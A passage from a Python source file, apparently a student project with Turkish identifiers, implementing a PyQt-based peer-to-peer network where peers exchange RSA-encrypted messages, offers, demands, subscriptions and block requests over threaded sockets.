\"BY\".encode():\r\n print(\"read thread istemci BY dasın\")\r\n break\r\n self.lQueue.put(\"Read Thread Istemci Sonlandirildi\")\r\n self.csoc.close()\r\n\r\n\r\nclass WriteThreadIstemci(threading.Thread):\r\n def __init__(self, csoc, writeQueue,lQueue):\r\n threading.Thread.__init__(self)\r\n self.csoc = csoc\r\n self.writeQueue = writeQueue\r\n self.lQueue=lQueue\r\n\r\n def run(self):\r\n while True:\r\n if not self.writeQueue.empty():\r\n queueMessage = self.writeQueue.get()\r\n if (type(queueMessage) == str):\r\n print(\"tip stringmiş\")\r\n self.csoc.send(queueMessage.encode())\r\n if queueMessage.strip()[0:2] == \"QU\":\r\n print(\"write thread istemci qu dasın\")\r\n break\r\n else:\r\n print(\"tip string degilmiş\")\r\n self.csoc.send(queueMessage)\r\n self.lQueue.put(\"WriteThreadIstemci sonlandirildi\")\r\n\r\n #self.csoc.close()\r\n\r\n\r\nclass ClientDialog(QMainWindow):\r\n def __init__(self, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi, abonelikFihristi, uuid, ip, port,\r\n screenQueue,\r\n sistemTipi, geoloc, nickname, my_public_key, my_private_key,lQueue):\r\n\r\n self.writeQueue = queue.Queue()\r\n self.connectedFlag = 0\r\n self.screenQueue = screenQueue\r\n self.uuid = uuid\r\n self.ip = ip\r\n self.port = port\r\n self.sistemTipi = sistemTipi\r\n self.geoloc = geoloc\r\n self.nickname = nickname\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n 
self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.komsuFihristi = komsuFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n\r\n self.karsiServerID={}\r\n\r\n self.clickedKomsuIP = None\r\n self.clickedKomsuPort = None # bir komsuya tiklandiginda connect butonunun calismasi icin gereken bilgiler\r\n self.clickedKomsuUUID = None\r\n\r\n self.lQueue=lQueue\r\n\r\n\r\n\r\n\r\n self.qt_app = QApplication(sys.argv)\r\n QMainWindow.__init__(self, None)\r\n loadUi(\"arayuz.ui\", self)\r\n\r\n self.label_kullaniciBilgisi.setText(self.nickname + \" (ID: \" + str(self.uuid) + \")\")\r\n\r\n self.send_button.clicked.connect(self.outgoing_parser)\r\n self.pushButton_connect.clicked.connect(lambda _, s=\"connect\": self.clickedActionButton(x=s))\r\n self.pushButton_connections.clicked.connect(lambda _, s=\"CS\": self.clickedActionButton(x=s))\r\n self.pushButton_publicKey.clicked.connect(lambda _, s=\"PK\": self.clickedActionButton(x=s))\r\n self.pushButton_demandes.clicked.connect(lambda _, s=\"DM\": self.clickedActionButton(x=s))\r\n self.pushButton_offers.clicked.connect(lambda _, s=\"OF\": self.clickedActionButton(x=s))\r\n self.pushButton_message.clicked.connect(lambda _, s=\"MS\": self.clickedActionButton(x=s))\r\n self.pushButton_subscribe.clicked.connect(lambda _, s=\"SB\": self.clickedActionButton(x=s))\r\n self.pushButton_block.clicked.connect(lambda _, s=\"BL\": self.clickedActionButton(x=s))\r\n self.pushButton_quit.clicked.connect(lambda _, s=\"QU\": self.clickedActionButton(x=s))\r\n self.pushButton_newdemand.clicked.connect(lambda _, s=\"AA\": self.clickedActionButton(x=s))\r\n self.pushButton_newoffer.clicked.connect(lambda _, s=\"AB\": self.clickedActionButton(x=s))\r\n\r\n self.timer = QTimer()\r\n func = functools.partial(self.updateText)\r\n self.timer.timeout.connect(func)\r\n self.timer.start(10)\r\n\r\n self.timerKomsuListesi = QTimer()\r\n func2 = functools.partial(self.updateKomsuListesi)\r\n self.timerKomsuListesi.timeout.connect(func2)\r\n self.timerKomsuListesi.start(2000)\r\n\r\n self.timerUI = QTimer()\r\n func3 = functools.partial(self.updateUI)\r\n self.timerUI.timeout.connect(func3)\r\n self.timerUI.start(10)\r\n\r\n def clickedActionButton(self, x):\r\n data = self.sender.text()\r\n x = str(x)\r\n print(x)\r\n if not (x == \"connect\" or x == \"PK\" or x == \"SB\" or x == \"BL\" or x == \"DM\" or x == \"OF\" or x == \"QU\") and data == \"\":\r\n self.screenQueue.put(\"Local: Lütfen gerekli parametreleri alt kısma yazdıktan sonra butonu kullanın.\")\r\n return\r\n elif x == \"connect\":\r\n dataSplit = data.split(\":\")\r\n\r\n if self.clickedKomsuPort != None and self.clickedKomsuIP != None and len(dataSplit) == 0:\r\n ip = str(self.clickedKomsuIP)\r\n port = int(self.clickedKomsuPort)\r\n else:\r\n if len(dataSplit) == 2:\r\n ip = str(dataSplit[0])\r\n port = int(dataSplit[1])\r\n else:\r\n self.screenQueue.put(\"Local: Yanlış parametre kullanımı.\")\r\n return\r\n\r\n IstTh = IstemciThread(ip, port, self.ip, self.port, self.uuid, self.sistemTipi, self.geoloc,\r\n self.nickname,\r\n self.screenQueue, self.writeQueue, self.talepFihristi, self.arzFihristi,\r\n self.my_public_key, self.my_private_key,self.komsuFihristi,self.abonelikFihristi,self.komsuArzFihristi, self.komsuTalepFihristi, self.lQueue)\r\n IstTh.start()\r\n self.connectedFlag = 1\r\n self.writeQueue.put(\"HE\")\r\n\r\n elif x == \"SB\" or x == \"BL\" or x == \"PK\" or x == 
\"QU\":\r\n if x == \"QU\":\r\n self.connectedFlag = 0\r\n if x == \"PK\":\r\n x = x+\":\" + str(self.my_public_key.n) + \":\" + str(self.my_public_key.e)\r\n if x == \"BL\":\r\n try:\r\n if self.abonelikFihristi[int(self.clickedKomsuUUID)][2]:#bende engelli mi\r\n karar = \"F\"\r\n else:\r\n karar = \"T\"\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n print(karar)\r\n crypted_message = rsa.encrypt(str(karar).encode(), komsu_pub_key)\r\n self.writeQueue.put(\"BL:\".encode() + crypted_message)\r\n\r\n except:\r\n self.screenQueue.put(\"Bağlı olduğunuz komşuyu soldan seçiniz.\")\r\n if x == \"SB\":\r\n try:\r\n if self.abonelikFihristi[int(self.clickedKomsuUUID)][1]: # bende ona abone miyim\r\n karar = \"F\"\r\n else:\r\n karar = \"T\"\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(karar.encode(), komsu_pub_key)\r\n self.writeQueue.put(\"SB:\".encode() + crypted_message)\r\n except:\r\n self.screenQueue.put(\"Bağlı olduğunuz komşuyu soldan seçiniz.\")\r\n\r\n self.writeQueue.put(x)\r\n elif x == \"CS\" or x == \"MS\" or x == \"AA\" or x == \"DM\" or x == \"OF\" or x == \"AB\":\r\n if x == \"MS\":\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(data).encode(), komsu_pub_key)\r\n\r\n self.writeQueue.put(\"MS:\".encode() + crypted_message)\r\n else:\r\n self.writeQueue.put(x+\":\"+data)\r\n print(x+\":\"+data)\r\n self.screenQueue.put(\"Local: \" + data)\r\n\r\n\r\n def updateText(self):\r\n\r\n if not self.screenQueue.empty():\r\n data = self.screenQueue.get()\r\n\r\n t = time.localtime()\r\n pt = \"%02d:%02d\" % (t.tm_hour, t.tm_min)\r\n\r\n self.channel.append(pt + \" \" +data)\r\n else:\r\n return\r\n\r\n def updateUI(self):\r\n self.pushButton_subscribe.setText(\"Abone Ol/Çık\")\r\n self.pushButton_block.setText(\"Engelle/En. Kaldır\")\r\n\r\n self.pushButton_connect.setEnabled(True)\r\n self.pushButton_connections.setEnabled(True)\r\n self.pushButton_publicKey.setEnabled(True)\r\n self.pushButton_demandes.setEnabled(True)\r\n self.pushButton_offers.setEnabled(True)\r\n self.pushButton_message.setEnabled(True)\r\n self.pushButton_subscribe.setEnabled(True)\r\n self.pushButton_block.setEnabled(True)\r\n self.pushButton_quit.setEnabled(True)\r\n self.pushButton_newdemand.setEnabled(True)\r\n self.pushButton_newoffer.setEnabled(True)\r\n\r\n def updateKomsuListesi(self):\r\n kullaniciButonlari = []\r\n\r\n for i in reversed(range(self.KomsuListesiLayoutu.count())):\r\n self.KomsuListesiLayoutu.itemAt(i).widget().setParent(\r\n None) # arayuzdeki komsu listesini sildik. 
yeniden olusturacagiz.\r\n sayac = 0\r\n for key in list(self.komsuFihristi):\r\n kullaniciButonlari.append(sayac)\r\n kullaniciButonlari[sayac] = QPushButton(self.komsuFihristi[key][6])\r\n kullaniciButonlari[sayac].clicked.connect(lambda _, s=key: self.clickedKomsuButonu(x=s))\r\n self.KomsuListesiLayoutu.addWidget(kullaniciButonlari[sayac])\r\n sayac = sayac + 1\r\n\r\n def clickedKomsuButonu(self, x):\r\n self.clickedKomsuIP = self.komsuFihristi[x][0]\r\n self.clickedKomsuPort = self.komsuFihristi[x][1]\r\n self.clickedKomsuUUID = x\r\n\r\n def outgoing_parser(self):\r\n\r\n data = self.sender.text()\r\n self.screenQueue.put(\"Local: \" + data)\r\n\r\n #komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[self.clickedKomsuUUID][4]), int(self.komsuFihristi[self.clickedKomsuUUID][3])) # pubk(n,e)\r\n #print(komsu_pub_key)\r\n if len(data) == 0:\r\n return\r\n if data[0] == \"/\":\r\n\r\n dataSplitted = data.replace(\"/\", \"\").split((\":\"))\r\n command = dataSplitted[0]\r\n\r\n if command == \"connect\": # Bir peer'a /connect:ip:port seklinde baglanmak\r\n ip = dataSplitted[1]\r\n ip = str(ip)\r\n\r\n port = dataSplitted[2]\r\n\r\n\r\n kuuid = dataSplitted[3]\r\n\r\n IstemciQueue=queue.Queue()\r\n\r\n\r\n \"\"\"komsuFihristi[int(parsedData[1])] = [parsedData[2], parsedData[3], parsedData[4], parsedData[5],\r\n parsedData[6], parsedData[7], parsedData[8], parsedData[9]]\"\"\"\r\n IstTh = IstemciThread(ip, port, self.ip, self.port, self.uuid, self.sistemTipi, self.geoloc,\r\n self.nickname, self.screenQueue, self.writeQueue, self.talepFihristi,\r\n self.arzFihristi, self.my_public_key, self.my_private_key,\r\n self.komsuFihristi,self.abonelikFihristi,self.komsuArzFihristi,self.komsuTalepFihristi,self.lQueue)\r\n self.lQueue.put(str(ip))\r\n self.lQueue.put(\"adli ip ile baglanti kuruldu\")\r\n \"\"\"IstTh = IstemciThread(ip, port, self.ip, self.port, self.uuid, self.sistemTipi, self.geoloc,\r\n self.nickname, self.screenQueue, IstemciQueue, self.talepFihristi,\r\n self.arzFihristi, self.my_private_key, self.my_private_key,\r\n self.komsuFihristi, self.abonelikFihristi, self.komsuArzFihristi,\r\n self.komsuTalepFihristi)\"\"\"\r\n IstTh.start()\r\n\r\n self.clickedKomsuPort = port\r\n self.clickedKomsuIP = ip\r\n self.clickedKomsuUUID = kuuid\r\n\r\n self.connectedFlag = 1\r\n\r\n self.writeQueue.put(\"HE\")\r\n elif command == \"quit\" and self.connectedFlag == 1:\r\n self.connectedFlag = 0\r\n self.writeQueue.put(\"QU\")\r\n elif command == \"connections\" and self.connectedFlag == 1:\r\n\r\n num = dataSplitted[1]\r\n self.writeQueue.put(\"BEGIN:\" + num)\r\n elif command == \"publicKey\" and self.connectedFlag == 1:\r\n self.writeQueue.put(data.replace(\"/publicKey\", \"PK\"))\r\n elif command == \"demandes\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n safData = data.split(\":\", 1)\r\n crypted_m = rsa.encrypt(str(safData[1]).encode(), komsu_pub_key)\r\n cyrpted_message = \"DM\".encode() + \":\".encode() + crypted_m\r\n self.writeQueue.put(cyrpted_message) # TODO: DEMANDES ILE BU TARAFIN DEMANDE LISTESINI GONDER\r\n\r\n elif command == \"offers\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n safData = data.split(\":\", 1)\r\n crypted_m = 
rsa.encrypt(str(safData[1]).encode(), komsu_pub_key)\r\n cyrpted_message = \"OF\".encode() + \":\".encode() + crypted_m\r\n self.writeQueue.put(cyrpted_message) # TODO: OFFERS ILE BU TARAFIN OFFERS LISTESINI GONDER\r\n\r\n elif command == \"message\" and self.connectedFlag == 1:\r\n\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(dataSplitted[1]).encode(), komsu_pub_key)\r\n\r\n self.writeQueue.put(\"MS:\".encode() + crypted_message)\r\n print(\"mesaj gönderildiiii\")\r\n\r\n elif command == \"block\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(dataSplitted[1]).encode(), komsu_pub_key)\r\n print(\"mesaj crypto\")\r\n self.writeQueue.put(\"BL:\".encode() + crypted_message)\r\n elif command == \"subscribe\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(dataSplitted[1]).encode(), komsu_pub_key)\r\n print(\"mesaj crypto\")\r\n self.writeQueue.put(\"SB:\".encode() + crypted_message)\r\n\r\n elif command == \"newdemand\" and self.connectedFlag == 1: #arz\r\n self.writeQueue.put(data.replace(\"/newdemand\", \"AA\")) # yanitleri A0 (olumlu), A1\r\n elif command == \"newoffer\" and self.connectedFlag == 1: #talep gönderme\r\n self.writeQueue.put(data.replace(\"/newoffer\", \"AB\")) # yanitleri A2 (olumlu), A3\r\n else:\r\n if self.connectedFlag == 1:\r\n self.screenQueue.put(\"Local: Command Error.\")\r\n else:\r\n self.screenQueue.put(\"Giris yapilmali\")\r\n else:\r\n self.screenQueue.put(\"Komutlar '/' ile baslamalidir.\")\r\n\r\n self.sender.clear()\r\n\r\n def run(self):\r\n self.show()\r\n self.qt_app.exec_()\r\n\r\n\r\nclass IstemciThread(threading.Thread):\r\n def __init__(self, ip, port, selfIP, selfPORT, uuid, sistemTipi, geoloc, nickname, screenQueue, writeQueue,\r\n talepFihristi,\r\n arzFihristi, my_public_key, my_private_key,komsuFihristi,abonelikFihristi,komsuArzFihristi,komsuTalepFihristi,lQueue):\r\n threading.Thread.__init__(self)\r\n\r\n self.ScreenQueue = screenQueue\r\n self.WriteQueue = writeQueue\r\n self.sistemTipi = sistemTipi\r\n self.geoloc = geoloc\r\n self.nickname = nickname\r\n self.ip = ip\r\n self.port = int(port)\r\n self.selfIP = selfIP\r\n self.selfPORT = selfPORT\r\n self.uuid = uuid\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.komsuFihristi = komsuFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n self.lQueue=lQueue\r\n\r\n\r\n def run(self):\r\n s1 = socket.socket()\r\n s1.connect((self.ip, self.port))\r\n metin = str(\"Connected to server with Peer Ip = \" + str(self.ip) + \" and Port = \" + str(self.port))\r\n self.lQueue.put((metin))\r\n\r\n wtIstemci = WriteThreadIstemci(s1, self.WriteQueue,self.lQueue)\r\n rtIstemci = ReadThreadIstemci(s1, self.WriteQueue, self.ScreenQueue, self.uuid, self.ip, self.port, self.selfIP,\r\n self.selfPORT, self.sistemTipi, self.geoloc, self.nickname, self.my_public_key,\r\n 
self.my_private_key, self.arzFihristi, self.talepFihristi, self.komsuFihristi,self.abonelikFihristi,self.komsuArzFihristi, self.komsuTalepFihristi,self.lQueue)\r\n\r\n wtIstemci.start()\r\n rtIstemci.start()\r\n\r\n\r\nclass WriteThreadServer(threading.Thread):\r\n def __init__(self, csoc, address, threadQueue,lQueue):\r\n threading.Thread.__init__(self)\r\n self.csoc = csoc\r\n self.address = address\r\n self.tqueue = threadQueue\r\n self.lQueue=lQueue\r\n\r\n def run(self):\r\n while True:\r\n queueMessage = self.tqueue.get()\r\n self.csoc.send((queueMessage + '\\n').encode())\r\n if queueMessage[0:2] == \"BY\":\r\n break\r\n self.csoc.close()\r\n\r\n\r\nclass ReadThreadServer(threading.Thread):\r\n def __init__(self, uuid,host,port, csoc, address, screenQueue, threadQueue, komsuFihristi, abonelikFihristi, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, my_public_key,\r\n my_private_key,lQueue):\r\n threading.Thread.__init__(self)\r\n # self.name = name\r\n self.uuid = uuid\r\n self.nickname = None\r\n self.csoc = csoc\r\n self.address = address\r\n self.tQueue = threadQueue\r\n self.komsuFihristi = komsuFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.my_public_Key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.host = host\r\n self.port = port\r\n self.istemciID = 0\r\n self.istemciDurum = False\r\n self.screenQueue = screenQueue\r\n self.kisi_var_mi = False\r\n self.uuid1 = 0 # rg\r\n self.uuid2 = 0 # ig\r\n\r\n # b\r\n self.kullanici_ip = \"\"\r\n self.kullanici_port = 0\r\n self.kullanici_geo = \"\"\r\n self.kullanici_tipi = \"\"\r\n self.kullanici_ismi = \"\"\r\n self.kullanici_engelDurumu = False\r\n self.kullanici_publickey = None\r\n self.lQueue=lQueue\r\n\r\n def parser(self, dataInByte):\r\n # def parser(self, data):\r\n\r\n # parsedData = data.split(\":\")\r\n\r\n if dataInByte[0:2] == \"RG\".encode():\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n self.uuid1 = int(parsedData[1])\r\n for key in self.komsuFihristi.keys(): # Komsu fihristinde daha onceden var mi?\r\n if (int(parsedData[1]) == key):\r\n self.kisi_var_mi = True\r\n self.istemciID = key\r\n break\r\n if self.kisi_var_mi: # Komsu fihristinde daha onceden var.\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True): # Kisi listesinde var ve engelli mi?\r\n self.tQueue.put(data.replace(\"RG\", \"RN\"))\r\n else: # Kisi listesinde var ve engelli degil mi?\r\n self.istemciDurum = True\r\n self.tQueue.put(data.replace(\"RG\", \"RO\"))\r\n else: # Kisi listesinde yok mu?\r\n self.tQueue.put(data.replace(\"RG\", \"RNN\")) # kisi listesinde yok ama ekleniyo ?\r\n elif dataInByte[0:3] == \"END\".encode():\r\n self.tQueue.put(\"END\")\r\n\r\n elif dataInByte[0:5] == \"BEGIN\".encode():\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n self.tQueue.put(dataInByte.decode())\r\n\r\n # elif parsedData[0] == \"IG\":\r\n elif dataInByte[0:2] == \"IG\".encode():\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n if(len(parsedData)>1):\r\n self.uuid2 = parsedData[1]\r\n if int(self.uuid1) == int(self.uuid2):\r\n print(\"olduuu\")\r\n self.istemciDurum = True\r\n self.istemciID=int(self.uuid1)\r\n self.abonelikFihristi[int(self.istemciID)]=[None,None,None,None] # 1. 
value: abone_mi\r\n # 2. value: ben_ona_abone_mi\r\n # 3. value: bende_engellemi(self.komsuFihristi[int(self.kullanici_uuid)][5])\r\n # 4. value: ben_onda_engellimi\r\n\r\n self.komsuFihristi[int(parsedData[1])]=[parsedData[2], parsedData[3], parsedData[4], parsedData[5],\r\n parsedData[6], parsedData[7],parsedData[8],parsedData[9] ]\r\n self.kisi_var_mi=True\r\n self.tQueue.put(\"OG:\" + str(self.uuid))\r\n else:\r\n self.tQueue.put(\"RN\")\r\n elif(len(parsedData)==1):\r\n self.tQueue.put(\"OG\" +str(self.uuid))\r\n else:\r\n self.tQueue.put(\"RN\")\r\n\r\n\r\n elif dataInByte[0:2] == \"HE\".encode():\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n self.tQueue.put(data + \":\" + str(self.uuid))\r\n\r\n\r\n # elif parsedData[0] == \"PK\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"PK\".encode() and self.istemciDurum == True:\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n\r\n self.tQueue.put(\"PK:\" + str(self.my_public_Key.n) + \":\" + str(self.my_public_Key.e)) # pubk (n,e)\r\n if parsedData[1] != None or parsedData[2] != None:\r\n self.kullanici_publickey = rsa.key.PublicKey(int(parsedData[1]), int(parsedData[2]))\r\n else:\r\n self.kullanici_publickey = None\r\n self.tQueue.put(\"PN\")\r\n\r\n # elif parsedData[0] == \"PT\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"PT\".encode() and self.istemciDurum == True:\r\n\r\n sifreliMetin = dataInByte[3:].strip()\r\n print(self.komsuFihristi)\r\n\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n decrypt_uuid = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n if int(self.uuid) == int(decrypt_uuid.decode()):\r\n if self.kullanici_publickey == None:\r\n self.tQueue.put(\"PO\")\r\n else:\r\n encrypt_kullanici_uuid = rsa.encrypt(str(self.istemciID).encode(),self.kullanici_publickey)\r\n # self.tQueue.put(\"PO:\" + encrypt_kullanici_uuid)\r\n self.csoc.send(\"PO:\".encode() + encrypt_kullanici_uuid)\r\n # self.tQueue.put(\"PO:\".encode() + encrypt_kullanici_uuid)\r\n elif dataInByte[0:8] == \"CO:BEGIN\".encode():\r\n print(\"buraya\")\r\n print(dataInByte)\r\n self.tQueue.put(str(dataInByte.decode()))\r\n # elif data[0:2] == \"CS\":\r\n elif dataInByte[0:2] == \"CS\".encode():\r\n num = int(dataInByte.decode().split(\":\")[1])\r\n if (len(self.komsuFihristi) < num): num = len(self.komsuFihristi)\r\n geoloc = self.komsuFihristi.get(self.istemciID)[5]\r\n counter = 0 # num sayısına varmamız icin tutulan deger\r\n list = []\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n # self.tQueue.put(\"CO:BEGIN\")\r\n for i in self.komsuFihristi:\r\n if (self.komsuFihristi[i][5] == geoloc):\r\n list.append(str(\"CO:\" + str(i) + \":\" + str(self.komsuFihristi[i][0]) + \":\" + str(\r\n self.komsuFihristi[i][1]) + \":\" + str(self.komsuFihristi[i][2]) + \":\" + str(\r\n self.komsuFihristi[i][3]) + \":\" + str(self.komsuFihristi[i][4]) + \":\" + str(self.komsuFihristi[i][5]) + \":\" + str(self.komsuFihristi[i][6] + \":\" + str(self.komsuFihristi[i][7]))))\r\n\r\n counter += 1\r\n if (counter == num):\r\n self.tQueue.put(','.join(list))\r\n print(','.join(list))\r\n break\r\n # self.tQueue.put(\"CO:END\")\r\n elif dataInByte[0:2] == \"AV\".encode():\r\n print(\"gelmis\")\r\n print(dataInByte)\r\n 
self.tQueue.put(str(dataInByte.decode()))\r\n\r\n # elif parsedData[0] == \"MS\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"MS\".encode() and self.istemciDurum == True:\r\n sifreliMetin = dataInByte[3:].strip()\r\n\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n self.tQueue.put(\"RN\")\r\n else:\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n self.screenQueue.put(decrypt_message.decode())\r\n self.tQueue.put(\"MO\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \"\"\"data = dataInByte.decode()\r\n parsedData = data.split(\":\")\r\n print(self.komsuFihristi)\r\n\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True or self.abonelikFihristi[int(self.istemciID)][3] == True):\r\n self.tQueue.put(\"RN\")\r\n # elif (): #publicKeyFihristi:{key,uid,value,publickey}\r\n # self.tQueue.put(\"PN\") #oldugunu dusunurek kontrol yapildi)\r\n else:\r\n self.screenQueue.put(parsedData[1])\r\n self.tQueue.put(\"MO\")\"\"\"\r\n\r\n\r\n # elif data[0:2] == \"BL\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"BL\".encode() and self.istemciDurum == True:\r\n sifreliMetin = dataInByte[3:].strip()\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n if (decrypt_message.decode() == \"T\" and self.abonelikFihristi[self.istemciID][3] != True): # kişinin engellenmesi\r\n self.abonelikFihristi[self.istemciID][3] = True # abonelik Fihristindeki engelli olma durumunu güncellemek için kullanılır\r\n self.tQueue.put(\"BOT\")\r\n if (self.abonelikFihristi[self.istemciID][0] == True): # onun üyeğinden çıkıyorum (0. parametre onun bana üye olması\r\n self.abonelikFihristi[self.istemciID][0] = False\r\n print(\"engellendin\")\r\n elif decrypt_message.decode() == \"T\" and self.abonelikFihristi[self.istemciID][3] == True: # kişi engelli olduğu halde engellenmesi\r\n self.tQueue.put(\"RNBT\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[self.istemciID][3] == True): # kişinin engelinin kaldırılması\r\n self.abonelikFihristi[self.istemciID][3] = False\r\n self.tQueue.put(\"BOF\")\r\n print(\"engelin kaldırıldı\")\r\n elif decrypt_message.decode() == \"F\" and self.abonelikFihristi[self.istemciID][3] == None: # kişi engellenmeden engelin kaldırılma durumu\r\n self.tQueue.put(\"RNBB\")\r\n elif decrypt_message.decode() == \"F\" and self.abonelikFihristi[self.istemciID][3] == False: # kişinin engeli kaldırıldığı halde engelin kaldırılma istği gelmesi\r\n self.tQueue.put(\"RNBF\")\r\n else:\r\n print(\"pass tayım\")\r\n pass\r\n print(self.abonelikFihristi)\r\n # elif data[0:2] == \"SB\" and self.istemciDurum == True:\r\n elif dataInByte[0:2] == \"SB\".encode() and self.istemciDurum == True:\r\n sifreliMetin = dataInByte[3:].strip()\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n if self.abonelikFihristi[int(self.istemciID)][2] == True:\r\n self.tQueue.put(\"RN\")\r\n # elif (self.publicKeyFihristi[i][3] == self.kullanici_publickey):\r\n # self.tQueue.put(\"PN\")\r\n else:\r\n if (decrypt_message.decode() == \"T\" and self.abonelikFihristi[int(self.istemciID)][0]!=True): # üye olma durumu, kaynakta gelen mesaj: SB:{T}\r\n self.abonelikFihristi[int(self.istemciID)][0] = True\r\n print(str(self.istemciID) + \": eklendi\")\r\n self.tQueue.put(\"SO\")\r\n elif(decrypt_message.decode() == \"T\" and self.abonelikFihristi[int(self.istemciID)][0]==True):\r\n self.tQueue.put(\"RNUT\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[int(self.istemciID)][0] == True): # üyelikten 
cıkma durumu, kaynakta gelen mesaj: SB:{F}\r\n # üye olmadan üyelikten çıkılmaz kontrolü yapılıyor\r\n self.abonelikFihristi[int(self.istemciID)][0] = False\r\n self.tQueue.put(\"SO\")\r\n print(str(self.istemciID) + \": cıktı\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[int(self.istemciID)][0] == False):\r\n self.tQueue.put(\"RNUF\")\r\n elif (decrypt_message.decode() == \"F\" and self.abonelikFihristi[int(self.istemciID)][0] == None):\r\n self.tQueue.put(\"RNUO\")\r\n else:\r\n pass # yanlis parametre verilmis, komut hatasi mesaji geri gitsin (ER\r\n print(self.abonelikFihristi)\r\n\r\n # elif data[0:2] == \"QU\":\r\n elif dataInByte[0:2] == \"QU\".encode() and self.istemciDurum == True:\r\n data = dataInByte.decode()\r\n parsedData = dataInByte.decode().split(\":\")\r\n self.tQueue.put(\"BY\")\r\n\r\n elif dataInByte[0:2] == \"DM\".encode():\r\n sifreliMetin = dataInByte[3:]\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n data = decrypt_message.decode()\r\n parsedData = data.split(\":\")\r\n\r\n if self.abonelikFihristi[int(self.istemciID)][2] == True:\r\n self.tQueue.put(\"RN\")\r\n elif parsedData[0] == \"N\":\r\n kayitSayisi = parsedData[1]\r\n kayitSayisi = int(kayitSayisi)\r\n if kayitSayisi > len(self.talepFihristi):\r\n kayitSayisi = len(self.talepFihristi)\r\n gonderArray = []\r\n gonderArray.append(\"DO:BEGIN\")\r\n counter = 0\r\n for i in self.talepFihristi:\r\n gonderArray.append(\r\n \"DO:\" + str(i) + \":\" + str(self.talepFihristi[i][0]) + \":\" + str(self.talepFihristi[i][1]) + \":\"\r\n + str(self.talepFihristi[i][2]) + \":\" + str(self.talepFihristi[i][3]) + \":\" +\r\n str(self.talepFihristi[i][4]) + \":\" + str(self.talepFihristi[i][5]))\r\n counter=counter+1\r\n if counter == 